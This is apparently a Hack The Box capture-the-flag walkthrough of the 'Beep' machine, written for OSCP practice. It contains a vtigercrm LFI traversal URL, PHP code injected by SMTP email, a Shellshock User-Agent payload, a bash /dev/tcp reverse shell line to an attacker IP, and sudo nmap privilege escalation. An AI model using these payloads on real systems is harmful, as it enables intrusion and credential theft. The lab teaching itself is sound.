Linux Boxes

beep

  1. nmap
  2. http
    1. gobuster
      1. /help
        1. beep backup date 2010
      2. /admin
      3. /mail
      4. /recordings
      5. /vtigercrm
  3. rooting box through LFI turned to RCE
    1. graph.php LFI
    2. /vtigercrm/graph.php?current_language exploit
      1. pw
      2. ssh root
    3. more LFI exploit info gathering w/ burp
      1. /etc/passwd
        1. /etc/passwd users
      2. /proc/self/status
        1. /var/lib/asterisk/.ssh/id_rsa
      3. leaking more sensitive files with burp suite's intruder
        1. fuzzdb github
          1. LFI-LogFileCheck.txt
        2. fuzzdb LFI checklist
          1. results
    4. foothold: turning LFI to RCE through SMTP php code embedded email
      1. php code injection into email
      2. burp payload test
        1. code execution
      3. swap to post request for reverse shell
        1. nc listener
        2. sudo -l
          1. asterisk can sudo on /etc/passwd
  4. rooting box w/ shellshock
    1. burp /bin/echo
    2. burp sleep
    3. shellshock reverse shell
    4. listener
  5. rooting box w/ RCE searchsploit
    1. priv esc w/ sudo nmap --interactive privesc
  6. user/root
  7. lessons learned

beep

images/334-1.png
images/334-2.png

nmap

images/336-1.png
images/336-2.png

http

images/1959-1.png

gobuster

gobuster dir -u https://10.10.10.7 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k

after checking each of the directories, there is not much that can help us besides the /admin directory that leaks, feel free to navigate to each page at your own discretion

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://10.10.10.7
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/02/29 19:18:46 Starting gobuster
===============================================================
/images (Status: 301)
/help (Status: 301)
/themes (Status: 301)
/modules (Status: 301)
/mail (Status: 301)
/admin (Status: 301)
/static (Status: 301)
/lang (Status: 301)
/var (Status: 301)
/panel (Status: 301)
/libs (Status: 301)
/recordings (Status: 301)
/configs (Status: 301)
/vtigercrm (Status: 301)
===============================================================
2020/02/29 20:06:08 Finished
===============================================================

/help

this big convoluted dashboard page looks like it could have some interesting finds in it but it is more of a rabbit hole to waste our time and energy

images/595-1.png

beep backup date 2010

images/596-1.png

/admin

unfortunately we can't access admin/config's page but we see that the box is using FreePBX version 2.8.1.4!
images/598-1.png

images/598-2.png

/mail

login page, could potentially brute force login with hydra/medusa but right now we have no idea what the username might be, move on
images/599-1.png

/recordings

another potential brute force candidate but we don't know enough information on what the login might be, move on

images/606-1.png

/vtigercrm

another potential brute force candidate but we don't know enough information on what the login might be, move on

images/608-1.png

rooting box through LFI turned to RCE

Since the webpage runs images/597-1.png
lets see if anything from searchsploit comes up

images/597-2.png

images/597-3.pngimages/597-4.png
we know the box runs onimages/597-5.png so the RCE exploit also checks out

local file inclusion seems interesting, plus we know FreePBX is on version 2.8.1.4

graph.php LFI

Lets take a look at the exploit code:

we see the LFI Exploit is located at the URL: /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

also we know beep uses vtigercrm so lets try it

images/609-1.png

images/609-2.png

/vtigercrm/graph.php?current_language exploit

/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
images/610-1.png

pw

fortunately enough, the password for root is located within this LFI and is jEhdIekWmdjE, but we'll explore alternatives to rooting this machine


ssh root

root pw jEhdIekWmdjE works from a listed password off of the amportal.conf file we saw using the LFI expoit from searchsploit
images/593-1.png

more LFI exploit info gathering w/ burp

we can enumerate more info on the box using our LFI exploit:

we can view other sensitive files by substituting other files where /etc/amportal.conf is right now...
images/611-1.png

/etc/passwd

images/612-1.png

/etc/passwd users

heres the accounts that are not “nologin”


root:x:0:0:root:/root:/bin/bash
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
news:x:9:13:news:/etc/news:
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
asterisk:x:100:101:Asterisk VoIP PBX:/var/lib/asterisk:/bin/bash
spamfilter:x:500:500::/home/spamfilter:/bin/bash
fanis:x:501:501::/home/fanis:/bin/bash

we can tell which accounts are real users by “bin/bash” and service accounts by “nologin”
given that users are:


/proc/self/status

we are running as Uid 100 and Gid 101, we see the user “Asterick” is assigned this Uid and Gid as well so we are logged in currently as him

we're leaking the images/616-1.png directory from the box
images/616-2.png

images/616-3.png

/var/lib/asterisk/.ssh/id_rsa

If we can exfiltrate Asterick's private key we can have an easy win on the box so its always worth trying out
images/617-1.png

images/617-2.png

no luck, lets move on

leaking more sensitive files with burp suite's intruder

we can use intruder to potentially enumerate more important file from this LFI that may be worth looking into:

images/615-1.png

fuzzdb github

we're going to use fuzzdb to find a list of file directories we can fuzz into our LFI input to enumerate
images/618-1.png

LFI-LogFileCheck.txt

Bingo! burp payload has a great list of default log and sensitive file locations

images/619-1.png

fuzzdb LFI checklist

now to paste the images/620-1.png into the burp suite intruder payload options list and start the attack

images/620-2.png

results

not much luck besides /etc/passwd based off the length of the responses being 232

images/621-1.png

232 char length invalid response reads:
images/621-2.png

foothold: turning LFI to RCE through SMTP php code embedded email

The server was listening over SMTP, so lets telnet to it:

images/622-1.png\

server responds with an ENHANCED smtp postfix, so we need to send an ENHANCED hello and identify who I am (arbitrary name is fine)

images/622-2.png\

from here lets check/verify asterisk is a valid user (code 252)
images/622-3.png

server responds it is

as apposed to this (code 550)
images/622-4.png


php code injection into email

images/623-1.png

now that we injected a php code execution script to asterisk through an SMTP email, only thing left to do is to test if it worked:

burp payload test

the /var/mail/asterisk folder should be where the contents of our email is located on the server:images/624-1.png

code execution

lets set the ippsec variable to whoami and see what we get asterick in the server response

images/626-1.png


Success!

swap to post request for reverse shell

Code pre URL encode:
images/627-1.png
After: Ctrl+U to URL encode
images/627-2.png

nc listener

Success! We have a shell

images/628-1.png

images/628-2.png

sudo -l

images/630-1.png

asterisk can sudo on /etc/passwd

alternative approach we can look into

images/631-1.png

rooting box w/ shellshock

Based on the date the box was created, it may be susceptable to a shell shock exploit

images/633-1.png


burp /bin/echo

User-Agent: () { :; }; /bin/echo “helloworld”
images/625-1.png

does not output on the server resonse but that doesn't factor the shellshock vuln out!, lets try sleep next
images/625-2.png
images/625-3.png

before we move on take note of the bytes returned and the time it took to respond
images/625-4.png

burp sleep

images/634-1.png
SUCCESS, we see the server response time took just over 10 seconds to complete
images/634-2.png
images/634-3.png

shellshock reverse shell

bash -i >& /dev/tcp/10.10.14.62/8081 0>&1 to connect back to our attacking machine:
images/636-1.png

images/636-2.png

listener

images/635-1.png
wait for it... Success! we have root
images/635-2.png

rooting box w/ RCE searchsploit

Lets go back to searchsploit and look up the RCE script

images/629-1.png


images/629-2.png
images/629-3.png


the code shows there is a vulnerability within interactive nmap by issuing '!sh'
lets give it a shot from our shell...

priv esc w/ sudo nmap --interactive privesc

simple initiation of nmap --interactive with sudo gives a shell that has root privileges!

images/632-1.png

user/root

images/637-1.png
aeff3def0c765c2677b94715cffa73ac

images/637-2.png
d88e006123842106982acce0aaf453f0

lessons learned

Check out Rana Khalil's OSCP writeups and prep at https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/

images/1960-1.png